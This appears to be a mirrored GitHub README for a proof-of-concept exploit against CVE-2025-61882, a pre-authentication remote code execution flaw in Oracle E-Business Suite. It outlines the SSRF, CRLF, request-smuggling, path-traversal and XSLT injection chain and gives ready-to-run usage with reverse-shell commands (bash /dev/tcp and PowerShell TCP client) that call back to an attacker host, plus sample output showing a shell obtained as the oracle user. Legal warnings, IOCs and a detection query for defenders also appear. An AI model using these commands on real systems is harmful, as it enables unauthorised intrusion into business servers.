来源

关联漏洞

描述

POC of CVE-2025-61882 

介绍

# CVE-2025-61882 Security Testing Tool

![CVSS](https://img.shields.io/badge/CVSS-9.8%20Critical-red)
![Status](https://img.shields.io/badge/Status-Actively%20Exploited-red)
![Platform](https://img.shields.io/badge/Platform-Oracle%20EBS-blue)
![License](https://img.shields.io/badge/License-Educational%20Use-yellow)

## 🚨 CRITICAL LEGAL WARNING

See our [blog post](https://blog.intelligencex.org/cve-2025-61882-oracle-zero-day-exploit-analysis) for technical details

**THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY**

```
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:        ║
║                                                              ║
║  ✓ You have WRITTEN AUTHORIZATION to test the target        ║
║  ✓ You accept FULL LEGAL RESPONSIBILITY for your actions    ║
║  ✓ You will COMPLY with all applicable laws                 ║
║  ✓ Unauthorized use may result in IMPRISONMENT              ║
║                                                              ║
║  If you DO NOT have authorization: EXIT NOW                 ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝
```

**Penalties for unauthorized use include:**
- Criminal prosecution under CFAA (US), Computer Misuse Act (UK), and equivalent laws
- Civil lawsuits for damages
- Substantial fines (up to $250,000+ in the US)
- Imprisonment (up to 10+ years depending on jurisdiction)
- Permanent criminal record

---

## 📋 Overview

Security testing tool for **CVE-2025-61882**, a critical pre-authentication remote code execution vulnerability affecting Oracle E-Business Suite.

**Created by:** Mindflare  
**Purpose:** Authorized security testing and vulnerability validation  
**Blog:** [Read the full technical analysis](#)

### Vulnerability Details

- **CVE ID:** CVE-2025-61882
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network (Unauthenticated)
- **Attack Complexity:** Medium
- **Privileges Required:** None
- **User Interaction:** None
- **Affected Versions:** Oracle E-Business Suite 12.2.3 - 12.2.14
- **Patch Status:** Emergency patch released October 4, 2025
- **Exploitation Status:** ⚠️ **ACTIVELY EXPLOITED** by Cl0p ransomware since August 2025

### Technical Summary

CVE-2025-61882 is a sophisticated exploit chain combining five distinct vulnerabilities:

1. **SSRF** - Server-Side Request Forgery via `/OA_HTML/configurator/UiServlet`
2. **CRLF Injection** - HTTP header injection in `return_url` parameter
3. **HTTP Smuggling** - Keep-alive connection abuse to reach internal services (port 7201)
4. **Authentication Bypass** - Path traversal via `/OA_HTML/help/../` prefix
5. **XSLT Injection** - Malicious XSL template processing leads to RCE

---

## 🎯 Intended Use Cases

### ✅ Acceptable Use

- Authorized penetration testing with written permission
- Security research on systems you own
- Vulnerability validation in controlled lab environments
- Red team exercises with proper scope documentation
- Academic research with institutional approval
- Incident response and forensic analysis

### ❌ Prohibited Use

- Any unauthorized system access
- Testing systems without explicit written permission
- Malicious activities or causing harm
- Attacking production systems without approval
- Using for criminal purposes
- Any activity violating applicable laws

---

## 📦 Installation

### Prerequisites

- Python 3.7 or higher
- pip package manager
- Network connectivity to target (authorized only)
- Netcat or similar listener for receiving reverse shell

### Setup

```bash
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
```

---

## 🚀 Usage

### Step 1: Set Up Your Listener

In a **separate terminal**, start a netcat listener:

```bash
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444
```

### Step 2: Run the Tool

**Basic Usage (Linux Target):**

```bash
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux
```

**Windows Target:**

```bash
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows
```

### Parameters

| Parameter | Description | Required | Example |
|-----------|-------------|----------|---------|
| `--target` | Target Oracle EBS URL | **Yes** | `http://192.168.1.22:8000` |
| `--lhost` | Your IP address (for callbacks) | **Yes** | `192.168.1.10` |
| `--lport` | HTTP server port (serves XSL payload) | **Yes** | `80` or `8080` |
| `--command` | Command to execute on target | **Yes** | See examples above |
| `--platform` | Target OS: `linux` or `windows` | **Yes** | `linux` |

---

## 📊 Example Output

### Tool Output

```
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
```

### Netcat Listener Output (If Vulnerable)

```bash
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
```

---

## 🛡️ Detection & Defense

### For Security Defenders

#### Immediate Actions

1. **Apply Oracle Emergency Patch** (Document ID: 30061882.1)
2. **Hunt for Compromise:**
   ```sql
   SELECT * FROM XDO_TEMPLATES_B 
   WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
   ```
3. **Review Access Logs** since August 2025
4. **Block outbound internet** from EBS servers

#### Detection Indicators

**Network IOCs:**
```
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
```

**HTTP Patterns:**
- `POST /OA_HTML/configurator/UiServlet`
- `POST /OA_HTML/SyncServlet`
- `GET /OA_HTML/help/../*.jsp`
- CRLF characters in parameters

---

## 📚 References

- [Oracle Security Alert Advisory](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Google/Mandiant Analysis](https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation)
- [watchTowr Labs Research](https://labs.watchtowr.com/)

---

## 📜 License

MIT License with Educational Use Restrictions - See [LICENSE](LICENSE)

**DISCLAIMER:** This software is for authorized security testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.

---

## 🔐 Final Warning

```
╔══════════════════════════════════════════════════════════════╗
║           WITH GREAT POWER COMES GREAT RESPONSIBILITY        ║
║                                                              ║
║        🔒 Stay Legal. Stay Ethical. Stay Professional. 🔒   ║
╚══════════════════════════════════════════════════════════════╝
```

**Created by:** Mindflare | **Last Updated:** October 2025

文件快照

 [4.0K]  /data/pocs/b44c677f98bbc893a9ac05d86ba357970a963179
├── [ 14K]  cve-2025-61882-detector.py
├── [2.5K]  LICENSE
├── [8.3K]  README.md
└── [  32]  requirements.txt

0 directories, 4 files

备注